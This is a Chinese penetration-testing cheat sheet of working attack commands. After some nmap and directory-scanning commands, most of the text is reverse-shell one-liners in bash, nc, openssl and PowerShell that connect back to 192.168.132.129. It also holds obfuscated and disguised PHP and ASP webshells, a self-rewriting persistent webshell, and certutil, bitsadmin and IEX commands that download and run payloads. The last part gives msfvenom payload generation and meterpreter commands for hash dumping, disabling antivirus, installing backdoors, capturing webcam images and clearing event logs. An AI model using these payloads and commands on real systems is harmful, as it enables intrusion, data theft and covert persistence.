渗透测试小笔记

#常规nmap -sS -sV -A -T 4 -p- ip_addr#快速扫描ports=$(nmap -p- --min-rate=1000 -sT -T4 10.10.10.10 | grep ^[0-9] | cut -d '/' -f 1 | tr 'n' ',' | sed s/,$//)nmap -sC -sV -p$ports -sT ip_addr

#常规python3 dirsearch.py -u url -e php,html,js,png,jpg,.txt#使用字典python3 dirsearch.py -u url -w ./wordlist.txt -e php,html,js,png,jpg,.txt

nikto -h ip(or url)

bash -i >& /dev/tcp/192.168.132.129/4444 0>&1 
/bin/bash -i > /dev/tcp/192.168.132.129/4444 0<& 2>&1
exec 5<>/dev/tcp/192.168.132.129/4444;cat <&5 | while read line; do $line 2>&5 >&5; done
exec /bin/sh 0</dev/tcp/192.168.132.129/4444 1>&0 2>&0
0<&196;exec 196<>/dev/tcp/192.168.132.129/4444; sh <&196 >&196 2>&196
#监听nc -lvp 4444

sh -i >& /dev/udp/192.168.132.129/4444 0>&1
#监听nc -luvp 4444

nc -e /bin/sh 192.168.132.129 4444
nc -e /bin/bash 192.168.132.129 4444
nc -c bash 192.168.132.129 4444
mknod backpipe p && nc 192.168.132.129 4444 0<backpipe | /bin/bash 1>backpipe
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.132.129 4444 >/tmp/f
rm -f /tmp/p; mknod /tmp/p p && nc 192.168.132.129 4444 0/tmp/p 2>&1
rm f;mkfifo f;cat f|/bin/sh -i 2>&1|nc 192.168.132.129 4444 > f
rm -f x; mknod x p && nc 192.168.132.129 4444 0<x | /bin/bash 1>x

ncat 192.168.132.129 4444 -e /bin/bash
ncat --udp 192.168.132.129 4444 -e /bin/bash

#攻击者openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodesopenssl s_server -quiet -key key.pem -cert cert.pem -port 443#orncat --ssl -vv -l -p 443#目标mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect 192.168.132.129:443 > /tmp/s; rm /tmp/s

xterm -display 192.168.132.129:4444

#cmd shellpowershell IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1');powercat -c 192.168.132.129 -p 4444 -e cmd.exe
#powershell shell（shell可能有问题）powershell IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1');powercat -c 192.168.132.129 -p 4444 -e powershell.exe
#反弹PowerShell shell，此方法可以绕过某些杀毒软件，如：赛门铁克powershell IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1');powercat -c 192.168.132.129 -p 4444 -ep

python -c 'import pty;pty.spawn("/bin/bash")' or python3 -c 'import pty;pty.spawn("/bin/bash")'

#基础<?php @eval($_POST['pass'])?>
#进阶<?php  $POST['POST']='assert'; $array[]=$POST; $array[0]['POST']($_POST['pass']);?>
#去掉敏感函数<?php ($_=@$_GET[2]).@$_($_POST['pass'])?>http://www.xxxx.com/3.php?2=assert
#避开关键字<?php  ($rcoil = $_POST['rcoil']) && @preg_replace('/ad/e','@'.str_rot13('riny').'($rcoil)', 'add');?>
#避开<?php<script language="php">@eval_r($_POST[pass])</script>
#404马<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html><?php@preg_replace("/[pageerror]/e",$_POST['error'],"saft");header('HTTP/1.1 404 Not Found');?>
#内存马<?phpignore_user_abort(true);ini_set('maxdb_execution_time', 0);while (true) {    if(!file_exists('demo.php')){        $a="<?php @eval("."$"."_POST"."[tese])?>";        file_put_contents('demo.php',$a);        file_put_contents('demo', base64_decode());    }}?>
#weevelyweevely generate <password> <path>weevely <URL> <password> [cmd]

#基础<%eval request("pass")%>
#进阶<% a=request(chr(97)) ExecuteGlobal(StrReverse(a)) %> #蚁剑连接 http://www.xxxx.com/2.asp?a=)0(tseuqer%20lave ；密码：0

sqlmap -r req.txt --current-user -p param #burp、zap 请求头sqlmap -u "http://example.com/?id=1" -p id --random-agent --threads=20 --os-shellsqlmap -u "http://example.com" --data "username=*&password=*"sqlmap --dbms=mysql -u "$URL" --dbssqlmap --dbms=mysql -u "$URL" -D "$DATABASE" --tablessqlmap --dbms=mysql -u "$URL" -D "$DATABASE" --sql-query "SELECT * FROM $TABLE;"

python reGeorgSocksProxy.py -u {Webshell 地址} -p {本地 Socks5 服务监听的端口}

#python2python -m SimpleHTTPServer 8888 #不带端口号时，默认 8000#python3python3 -m http.server 8888

#powershellpowershell (new-object System.Net.WebClient).DownloadFile('http://192.168.132.129:8000/evil.txt','evil.exe')#powershell 远程执行powershell -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.132.129:8000/evil.txt'))"
#certutilcertutil -urlcache -split -f http://192.168.132.129:8000/evil.txt test.exe
#Bitsadminbitsadmin /transfer n http://192.168.132.129:8000/evil.txt C:evil.exe

#wgetwget http://192.168.132.129:8000/evil.sh
#curlcurl http://192.168.132.129:8000/evil.sh -o evil.sh
#nc1) nc -lvp 4444 < evil.sh2) nc 192.168.132.129 4444 > evil.sh

show exploits #查看所有可用的渗透攻击程序代码 show auxiliary #查看所有可用的辅助攻击工具 show options #查看该模块所有可用选项 show payloads #查看该模块适用的所有载荷代码 show targets #查看该模块适用的攻击目标类型search #根据关键字搜索某模块 info #显示某模块的详细信息 use #进入使用某渗透攻击模块 back #回退 set/unset #设置/禁用模块中的某个参数 setg/unsetg #设置/禁用适用于所有模块的全局参数 save #将当前设置值保存下来，以便下次启动MSF终端时仍可使用

Linux:msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elfWindows:msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exeMac:msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f macho > shell.machoPHP:msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.phpcat shell.php | pbcopy && echo '<?php ' | tr -d 'n' > shell.php && pbpaste >> shell.phpASP:msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f asp > shell.aspJSP:msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.jspWAR:msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f war > shell.warPython:msfvenom -p cmd/unix/reverse_python LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.pyBash:msfvenom -p cmd/unix/reverse_bash LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.shPerl:msfvenom -p cmd/unix/reverse_perl LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.pl

getuid #当前权限查询background #返回到msf中getsystem #尝试提权到systemifconfig #查看网络配置upload <本机文件路径> <上传到目标的那个路径>hashdump #获取hashrun metsvc -A #自动安装后门screenshot #截屏sysinfo #获取操作系统平台详细信息ps #获取进程列表migrate <PID> #会话进程迁移webcam_list #查看摄像头信息webcam_snap #获取摄像头的摄的图像get_local_subnets #使用外部脚本route #路由查看run vnc #开启vncrun killav #关闭杀毒软件run scraper #获取系统信息getwd #获取当前目标机的工作路径download <目标机文件> <本机保存路径> #从目标机将文件下载到本机portfwd add -l <本机端口> -p <目标机要转发到本地的端口> -r <本机IP或127.0.0.1或0.0.0.0> #端口转发search -f <要搜索的文件名或者模糊搜索例如：*.txt> #文件搜索quit #退出当前会话shell #进入cmd shellgetlwd #操作攻击者主机 查看当前目录getproxy #查看代理信息kill <pid值> #杀死进程cat c:\lltest\lltestpasswd.txt # 查看文件内容edit c:\1.txt #编辑或创建文件 没有的话，会新建文件rm C:\lltest\hack.txtmkdir lltest2 #只能在当前目录下创建文件夹rmdir lltest2 #只能删除当前目录下文件夹clearev #清除系统日志

sudo apt-get -y install gitgit clone https://github.com/Veil-Framework/Veil.gitcd Veil/./config/setup.sh --force --silent

apt install nmapapt install ncatapt install python
#pip2curl https://bootstrap.pypa.io/get-pip.py -o get-pip.pypython get-pip.pyhash -r #若提示找不到，执行此命令
#msfcurl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall &&  chmod 755 msfinstall &&  ./msfinstall
#sqlmapgit clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap
#gitapt install git
#切换 nc 版本update-alternatives --config nc